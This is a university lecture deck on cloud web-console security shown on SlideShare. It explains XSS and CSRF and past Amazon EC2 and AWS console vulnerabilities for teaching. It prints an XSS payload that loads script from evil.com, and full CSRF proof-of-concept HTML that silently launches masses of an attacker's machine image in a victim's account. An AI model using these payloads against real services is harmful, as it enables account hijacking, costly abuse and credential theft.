SlideShare ist ein Scribd-Unternehmen logo

Cloud Insecurity

Marco Arena
Marco Arena

A short presentation for a university class.

TechnologieBusiness
1 von 32
Marco Arena
Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
Recalls • XSS (Cross-Site Scripting) vulnerability allows an attacker to use a website to transmit an attack (the website becomes the vector through which attackers reach their victims). • XSS is today’s most widely reported software vulnerability.
Recalls • XSS, a simple example: <c:if test=“${param.sayHello}”> Server-Side JSP Hello ${param.name}! </c:if> Evil parameter: %3Cscript%20src%3D%22Dhttp%3A//evil.com/evil.js%22%3E%3C /script%3E Result: Hello <script src=“http://evil.com/evil.js”></script>
Recalls • CSRF (Cross-Site Request Forgery) is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. • CSRF tricks the victim into loading a page that contains a malicious request.
Recalls • CSRF, a simple example: ... <img src=“http://truste Trusted blog (i.e. MySpace) dblog.com/addfrien d.php?id=12345”/> ... Active session User Evil Site
Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
Attacks against EC2 • The Amazon EC2 cloud is managed via web services and web interface consoles. • The web management console asks the user to provide her Amazon.com username and password. • The login page is hosted on the Amazon.com domain, making it susceptible to web application vulnerabilities found anywhere on the domain.
Attacks against EC2 • Once an attacker gains access to the EC2 user’s session, the Amazon web management console offers a wealth of information related to the victim’s EC2 instances (X.509 certificates, secret tokens, ...).
Attacks against EC2 • If the attacker discovers an XSS vulnerability anywhere on the Amazon.com domain, he can use a simple JavaScript payload to steal the EC2 user’s Access Key ID and Secret Access Key.
Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
Amazon EC2 real vulnerabilities • The security of AMI instances depends on the web management console for security. • Several portions of Amazon’s web management console were vulnerable to cross-site request forgery (CSRF) attacks.
Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
Web management console vulnerabilities • The first allows the attacker to start an arbitrary AMI instance using the victim’s EC2 account. • Two parts: – Initialize an evil AMI; – Launch the instance under the victim’s EC2 account.
Web management console vulnerabilities initialize.html: <html> <body> <img src="https://console.aws.amazon.com/ec2/_launchWizar dForm.jsp? action.ImageId=ami-00031337&architecture=i386& image_icon=%2Fimages%2Flogo_windows.gif& image_title=Basic%20Microsoft%20Windows%20Server%202 003& selected_language=undefined&groupName=Webserver&keyN ame=undefined"> </body> </html>
Web management console vulnerabilities initialize.html: Cross-Domain <html> Image Tag <body> <img src="https://console.aws.amazon.com/ec2/_launchWizar dForm.jsp? action.ImageId=ami-00031337&architecture=i386& image_icon=%2Fimages%2Flogo_windows.gif& image_title=Basic%20Microsoft%20Windows%20Server%202 003& selected_language=undefined&groupName=Webserver&keyN ame=undefined"> </body> </html>
Web management console vulnerabilities launch.html: <html> <body> <form action="https://console.aws.amazon.com/ec2/runInstancesJson?" id="LaunchEvilAMI" name="LaunchEvilAMI" method="POST"> <input type="hidden" name="action.MinCount" value="1" /> <input type="hidden" name="action.InstanceType" value="m1.small" /> <input type="hidden" name="action.SecurityGroup" value="default" /> <input type="hidden" name="action.SecurityGroup" value="Webserver" /> <input type="hidden" name="action.MaxCount" value="1000000" /> <input type="hidden" name="action.ImageId" value="ami-00031337" /> <input type="hidden" name="mbtc" value="50084" /> <input type="hidden" name="region" value="us-east-1" /> </form> <script> setTimeout("document.LaunchEvilAMI.submit()",5000); </script> </body> </html>
Web management console vulnerabilities
Web management console vulnerabilities Merge: <html> <body> <iframe src="./initialize.html" height="0" width="0"></iframe> <iframe src="./launch.html" height="0" width="0"></iframe> </body> </html>
Web management console vulnerabilities Merge: The browser will not display the reply of <html> the web server. <body> <iframe src="./initialize.html" height="0" width="0"></iframe> <iframe src="./launch.html" height="0" width="0"></iframe> </body> </html>
Web management console vulnerabilities • The second vulnerability terminates arbitrary AMIs being run by the victim. • After the attack is launched, the victim can see that the instance was terminated without her consent.
Web management console vulnerabilities • The last vulnerability involves the deletion of AMI key pairs. • Using a CSRF vulnerability, an attacker has the ability to delete arbitrary key pairs from a victim’s EC2 session. If the key pair is deleted, and the user has not properly backed up the key pair, he will have lost access to his own AMIs!
Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
AWS portals vulnerabilities • AWS was the first method Amazon provided to manage AMIs and is generally considered the most secure option for AMI administration. • The three most common methods of authentication are : – a username/password combination; – an Access Key ID/Secret Access Key combination; – and X.509 certificates
AWS portals vulnerabilities • AWS was the first method Amazon provided to manage AMIs and is generally considered the most secure option for AMI administration. • The three most common methods of authentication are : – a username/password combination; – an Access Key ID/Secret Access Key combination; – and X.509 certificates.
AWS portals vulnerabilities • The first attack against AWS generates a new access key for the EC2 user’s session. • Access keys are used to authenticate a user to AWS, which is used to administer and manage the various AMIs running in a user’s account. • The attacker can create a temporary denial of service as the administrator must now update all the applications utilizing access key authentication to use the newly generated key.
AWS portals vulnerabilities • This next attack forcibly deletes any X.509 certificates previously generated by the EC2 user. • Once the X.509 certificates are deleted, any application that relied on X.509 certificate authentication must be redeployed with the newly generated certificates.
Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
Conclusions • Cloud Computing allows organizations to focus on their core business while ensuring that their IT infrastructures are flexible enough to meet the demands of current and future users. • But it does not magically protect application logic from abuse or prevent attacks against the application level.
Conclusions • Uploading the most hardened virtual machine will not prevent attacks against the web-based management consoles that are used to administer the virtual machines. • Cloud providers must fix their security bugs and perform an incessant code review.
References • Hacking: the Next Generation Nitesh Dhanjani, Billy Rios, and Brett Hardin. O’Reilly, 2009. • Hacking Exposed: Web 2.0 Rich Cannings, Himanshu Dwivedi, Zane Lackey. Mc-Graw Hill, 2008 • Secure Programming with Static Analysis Brian Chess, Jacob West. Addison-Wesley, 2007.

Empfohlen

Security in the AWS Cloud - Steve Riley
Security in the AWS Cloud - Steve RileySecurity in the AWS Cloud - Steve Riley
Security in the AWS Cloud - Steve RileyAmazon Web Services
 
Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)
Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)
Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)PacSecJP
 
Cracking into embedded devices and beyond
Cracking into embedded devices and beyondCracking into embedded devices and beyond
Cracking into embedded devices and beyondamiable_indian
 
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo) Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo) Nitroxis Sprl
 
Full slidescr16
Full slidescr16Full slidescr16
Full slidescr16Lucio Grenzi
 
Hacking 101 3
Hacking 101 3Hacking 101 3
Hacking 101 3Nitroxis Sprl
 
WordPress Security 101 for developers
WordPress Security 101 for developersWordPress Security 101 for developers
WordPress Security 101 for developersRan Bar-Zik
 
Hacking 101 (Session 2)
Hacking 101 (Session 2)Hacking 101 (Session 2)
Hacking 101 (Session 2)Nitroxis Sprl
 

Empfohlen

Security in the AWS Cloud - Steve Riley
Security in the AWS Cloud - Steve RileySecurity in the AWS Cloud - Steve Riley
Security in the AWS Cloud - Steve RileyAmazon Web Services
 
Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)
Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)
Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)PacSecJP
 
Cracking into embedded devices and beyond
Cracking into embedded devices and beyondCracking into embedded devices and beyond
Cracking into embedded devices and beyondamiable_indian
 
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo) Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo) Nitroxis Sprl
 
Full slidescr16
Full slidescr16Full slidescr16
Full slidescr16Lucio Grenzi
 
Hacking 101 3
Hacking 101 3Hacking 101 3
Hacking 101 3Nitroxis Sprl
 
WordPress Security 101 for developers
WordPress Security 101 for developersWordPress Security 101 for developers
WordPress Security 101 for developersRan Bar-Zik
 
Hacking 101 (Session 2)
Hacking 101 (Session 2)Hacking 101 (Session 2)
Hacking 101 (Session 2)Nitroxis Sprl
 
Amazon cloudtutorial
Amazon cloudtutorialAmazon cloudtutorial
Amazon cloudtutorialChris Buenaventura
 
Security Function
Security FunctionSecurity Function
Security FunctionSamuel Soon
 
AWS Instance Preparation
AWS Instance PreparationAWS Instance Preparation
AWS Instance PreparationEbizon
 
Cloud Vulnerabilities and Its Threats
Cloud Vulnerabilities and Its ThreatsCloud Vulnerabilities and Its Threats
Cloud Vulnerabilities and Its ThreatsAri Apridana
 
Xss frame work
Xss frame workXss frame work
Xss frame workNgọc Liệu Nguyễn
 
Security Presentation for Boulder WordPress Meetup
Security Presentation for Boulder WordPress MeetupSecurity Presentation for Boulder WordPress Meetup
Security Presentation for Boulder WordPress MeetupAngela Bowman
 
Mos presentation 6 10
Mos presentation 6 10Mos presentation 6 10
Mos presentation 6 10LJepson
 
4 as speech 1993 newman and white
4 as speech 1993 newman and white4 as speech 1993 newman and white
4 as speech 1993 newman and whiteDosage
 
【本課題】04番 ハロー会議室
【本課題】04番 ハロー会議室【本課題】04番 ハロー会議室
【本課題】04番 ハロー会議室Fujtia Naoya
 
The Dawn Of New Web Giant
The Dawn Of New Web GiantThe Dawn Of New Web Giant
The Dawn Of New Web Giantparamlowe
 
Expansion termica Expansion lineal
Expansion termica Expansion linealExpansion termica Expansion lineal
Expansion termica Expansion linealMAREST10
 
Ad age planning imported 1983
Ad age planning imported 1983Ad age planning imported 1983
Ad age planning imported 1983Dosage
 
Cloud Security
Cloud SecurityCloud Security
Cloud SecurityRashmi Agale
 
Securing Media Content and Applications in the Cloud (MED401) | AWS re:Invent...
Securing Media Content and Applications in the Cloud (MED401) | AWS re:Invent...Securing Media Content and Applications in the Cloud (MED401) | AWS re:Invent...
Securing Media Content and Applications in the Cloud (MED401) | AWS re:Invent...Amazon Web Services
 
Best Practices for Security at Scale
Best Practices for Security at Scale Best Practices for Security at Scale
Best Practices for Security at Scale Amazon Web Services
 
Getting Started with Amazon EC2
Getting Started with Amazon EC2Getting Started with Amazon EC2
Getting Started with Amazon EC2Amazon Web Services
 
Amazon s3ec2
Amazon s3ec2Amazon s3ec2
Amazon s3ec2Dominik Hurtienne
 
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptWarning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptCyber Security Alliance
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeJeremiah Grossman
 
Architecting for the Cloud: Best Practices
Architecting for the Cloud: Best PracticesArchitecting for the Cloud: Best Practices
Architecting for the Cloud: Best PracticesAmazon Web Services
 
Aws interview questions
Aws interview questionsAws interview questions
Aws interview questionsPuneet Kumar Bhatia (MBA, ITIL V3 Certified)
 
Security Best Practices_John Hildebrandt
Security Best Practices_John HildebrandtSecurity Best Practices_John Hildebrandt
Security Best Practices_John HildebrandtHelen Rogers
 

Weitere ähnliche Inhalte

Was ist angesagt?

Security Function
Security FunctionSecurity Function
Security FunctionSamuel Soon
 
AWS Instance Preparation
AWS Instance PreparationAWS Instance Preparation
AWS Instance PreparationEbizon
 
Cloud Vulnerabilities and Its Threats
Cloud Vulnerabilities and Its ThreatsCloud Vulnerabilities and Its Threats
Cloud Vulnerabilities and Its ThreatsAri Apridana
 
Security Presentation for Boulder WordPress Meetup
Security Presentation for Boulder WordPress MeetupSecurity Presentation for Boulder WordPress Meetup
Security Presentation for Boulder WordPress MeetupAngela Bowman
 

Was ist angesagt? (6)

Amazon cloudtutorial
Amazon cloudtutorialAmazon cloudtutorial
Amazon cloudtutorial
 
Security Function
Security FunctionSecurity Function
Security Function
 
AWS Instance Preparation
AWS Instance PreparationAWS Instance Preparation
AWS Instance Preparation
 
Cloud Vulnerabilities and Its Threats
Cloud Vulnerabilities and Its ThreatsCloud Vulnerabilities and Its Threats
Cloud Vulnerabilities and Its Threats
 
Xss frame work
Xss frame workXss frame work
Xss frame work
 
Security Presentation for Boulder WordPress Meetup
Security Presentation for Boulder WordPress MeetupSecurity Presentation for Boulder WordPress Meetup
Security Presentation for Boulder WordPress Meetup
 

Andere mochten auch

Mos presentation 6 10
Mos presentation 6 10Mos presentation 6 10
Mos presentation 6 10LJepson
 
4 as speech 1993 newman and white
4 as speech 1993 newman and white4 as speech 1993 newman and white
4 as speech 1993 newman and whiteDosage
 
【本課題】04番 ハロー会議室
【本課題】04番 ハロー会議室【本課題】04番 ハロー会議室
【本課題】04番 ハロー会議室Fujtia Naoya
 
The Dawn Of New Web Giant
The Dawn Of New Web GiantThe Dawn Of New Web Giant
The Dawn Of New Web Giantparamlowe
 
Expansion termica Expansion lineal
Expansion termica Expansion linealExpansion termica Expansion lineal
Expansion termica Expansion linealMAREST10
 
Ad age planning imported 1983
Ad age planning imported 1983Ad age planning imported 1983
Ad age planning imported 1983Dosage
 

Andere mochten auch (7)

Mos presentation 6 10
Mos presentation 6 10Mos presentation 6 10
Mos presentation 6 10
 
4 as speech 1993 newman and white
4 as speech 1993 newman and white4 as speech 1993 newman and white
4 as speech 1993 newman and white
 
【本課題】04番 ハロー会議室
【本課題】04番 ハロー会議室【本課題】04番 ハロー会議室
【本課題】04番 ハロー会議室
 
The Dawn Of New Web Giant
The Dawn Of New Web GiantThe Dawn Of New Web Giant
The Dawn Of New Web Giant
 
Expansion termica Expansion lineal
Expansion termica Expansion linealExpansion termica Expansion lineal
Expansion termica Expansion lineal
 
Ad age planning imported 1983
Ad age planning imported 1983Ad age planning imported 1983
Ad age planning imported 1983
 
Cloud Security
Cloud SecurityCloud Security
Cloud Security
 

Ähnlich wie Cloud Insecurity

Securing Media Content and Applications in the Cloud (MED401) | AWS re:Invent...
Securing Media Content and Applications in the Cloud (MED401) | AWS re:Invent...Securing Media Content and Applications in the Cloud (MED401) | AWS re:Invent...
Securing Media Content and Applications in the Cloud (MED401) | AWS re:Invent...Amazon Web Services
 
Best Practices for Security at Scale
Best Practices for Security at Scale Best Practices for Security at Scale
Best Practices for Security at Scale Amazon Web Services
 
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptWarning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptCyber Security Alliance
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeJeremiah Grossman
 
Architecting for the Cloud: Best Practices
Architecting for the Cloud: Best PracticesArchitecting for the Cloud: Best Practices
Architecting for the Cloud: Best PracticesAmazon Web Services
 
Security Best Practices_John Hildebrandt
Security Best Practices_John HildebrandtSecurity Best Practices_John Hildebrandt
Security Best Practices_John HildebrandtHelen Rogers
 
Amazon ECS Container Service Deep Dive
Amazon ECS Container Service Deep DiveAmazon ECS Container Service Deep Dive
Amazon ECS Container Service Deep DiveAmazon Web Services
 
Aws big picture_overview
Aws big picture_overviewAws big picture_overview
Aws big picture_overviewAjay Bidari
 
Web Application Security in front end
Web Application Security in front endWeb Application Security in front end
Web Application Security in front endErlend Oftedal
 
AWS FIS の実験テンプレートを書いてみよう!!
AWS FIS の実験テンプレートを書いてみよう!!AWS FIS の実験テンプレートを書いてみよう!!
AWS FIS の実験テンプレートを書いてみよう!!政雄 金森
 
Best Practices for Security at Scale
Best Practices for Security at ScaleBest Practices for Security at Scale
Best Practices for Security at ScaleAmazon Web Services
 
Running your First Application on AWS
Running your First Application on AWSRunning your First Application on AWS
Running your First Application on AWSAmazon Web Services
 
Primeros pasos con arquitecturas serverless
Primeros pasos con arquitecturas serverlessPrimeros pasos con arquitecturas serverless
Primeros pasos con arquitecturas serverlessAmazon Web Services
 
AWS Architecting Cloud Apps - Best Practices and Design Patterns By Jinesh Varia
AWS Architecting Cloud Apps - Best Practices and Design Patterns By Jinesh VariaAWS Architecting Cloud Apps - Best Practices and Design Patterns By Jinesh Varia
AWS Architecting Cloud Apps - Best Practices and Design Patterns By Jinesh VariaAmazon Web Services
 
AWS March 2016 Webinar Series - Amazon EC2 Masterclass
AWS March 2016 Webinar Series - Amazon EC2 MasterclassAWS March 2016 Webinar Series - Amazon EC2 Masterclass
AWS March 2016 Webinar Series - Amazon EC2 MasterclassAmazon Web Services
 
[Games on AWS 2019] AWS 입문자를 위한 초단기 레벨업 트랙 | AWS 레벨업 하기! : 컨테이너 - 김세호 AWS 솔루션...
[Games on AWS 2019] AWS 입문자를 위한 초단기 레벨업 트랙 | AWS 레벨업 하기! : 컨테이너 - 김세호 AWS 솔루션...[Games on AWS 2019] AWS 입문자를 위한 초단기 레벨업 트랙 | AWS 레벨업 하기! : 컨테이너 - 김세호 AWS 솔루션...
[Games on AWS 2019] AWS 입문자를 위한 초단기 레벨업 트랙 | AWS 레벨업 하기! : 컨테이너 - 김세호 AWS 솔루션...Amazon Web Services Korea
 

Ähnlich wie Cloud Insecurity (20)

Securing Media Content and Applications in the Cloud (MED401) | AWS re:Invent...
Securing Media Content and Applications in the Cloud (MED401) | AWS re:Invent...Securing Media Content and Applications in the Cloud (MED401) | AWS re:Invent...
Securing Media Content and Applications in the Cloud (MED401) | AWS re:Invent...
 
Best Practices for Security at Scale
Best Practices for Security at Scale Best Practices for Security at Scale
Best Practices for Security at Scale
 
Getting Started with Amazon EC2
Getting Started with Amazon EC2Getting Started with Amazon EC2
Getting Started with Amazon EC2
 
Amazon s3ec2
Amazon s3ec2Amazon s3ec2
Amazon s3ec2
 
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptWarning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe
 
Architecting for the Cloud: Best Practices
Architecting for the Cloud: Best PracticesArchitecting for the Cloud: Best Practices
Architecting for the Cloud: Best Practices
 
Aws interview questions
Aws interview questionsAws interview questions
Aws interview questions
 
Security Best Practices_John Hildebrandt
Security Best Practices_John HildebrandtSecurity Best Practices_John Hildebrandt
Security Best Practices_John Hildebrandt
 
Amazon ECS Container Service Deep Dive
Amazon ECS Container Service Deep DiveAmazon ECS Container Service Deep Dive
Amazon ECS Container Service Deep Dive
 
Cloud Security (AWS)
Cloud Security (AWS)Cloud Security (AWS)
Cloud Security (AWS)
 
Aws big picture_overview
Aws big picture_overviewAws big picture_overview
Aws big picture_overview
 
Web Application Security in front end
Web Application Security in front endWeb Application Security in front end
Web Application Security in front end
 
AWS FIS の実験テンプレートを書いてみよう!!
AWS FIS の実験テンプレートを書いてみよう!!AWS FIS の実験テンプレートを書いてみよう!!
AWS FIS の実験テンプレートを書いてみよう!!
 
Best Practices for Security at Scale
Best Practices for Security at ScaleBest Practices for Security at Scale
Best Practices for Security at Scale
 
Running your First Application on AWS
Running your First Application on AWSRunning your First Application on AWS
Running your First Application on AWS
 
Primeros pasos con arquitecturas serverless
Primeros pasos con arquitecturas serverlessPrimeros pasos con arquitecturas serverless
Primeros pasos con arquitecturas serverless
 
AWS Architecting Cloud Apps - Best Practices and Design Patterns By Jinesh Varia
AWS Architecting Cloud Apps - Best Practices and Design Patterns By Jinesh VariaAWS Architecting Cloud Apps - Best Practices and Design Patterns By Jinesh Varia
AWS Architecting Cloud Apps - Best Practices and Design Patterns By Jinesh Varia
 
AWS March 2016 Webinar Series - Amazon EC2 Masterclass
AWS March 2016 Webinar Series - Amazon EC2 MasterclassAWS March 2016 Webinar Series - Amazon EC2 Masterclass
AWS March 2016 Webinar Series - Amazon EC2 Masterclass
 
[Games on AWS 2019] AWS 입문자를 위한 초단기 레벨업 트랙 | AWS 레벨업 하기! : 컨테이너 - 김세호 AWS 솔루션...
[Games on AWS 2019] AWS 입문자를 위한 초단기 레벨업 트랙 | AWS 레벨업 하기! : 컨테이너 - 김세호 AWS 솔루션...[Games on AWS 2019] AWS 입문자를 위한 초단기 레벨업 트랙 | AWS 레벨업 하기! : 컨테이너 - 김세호 AWS 솔루션...
[Games on AWS 2019] AWS 입문자를 위한 초단기 레벨업 트랙 | AWS 레벨업 하기! : 컨테이너 - 김세호 AWS 솔루션...
 

Kürzlich hochgeladen

Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Hiroshi SHIBATA
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersRaghuram Pandurangan
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...panagenda
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesThousandEyes
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentPim van der Noll
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Mark Goldstein
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...AliaaTarek5
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality AssuranceInflectra
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityIES VE
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...Wes McKinney
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rick Flair
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch TuesdayIvanti
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterMydbops
 

Kürzlich hochgeladen (20)

Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a reality
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
 
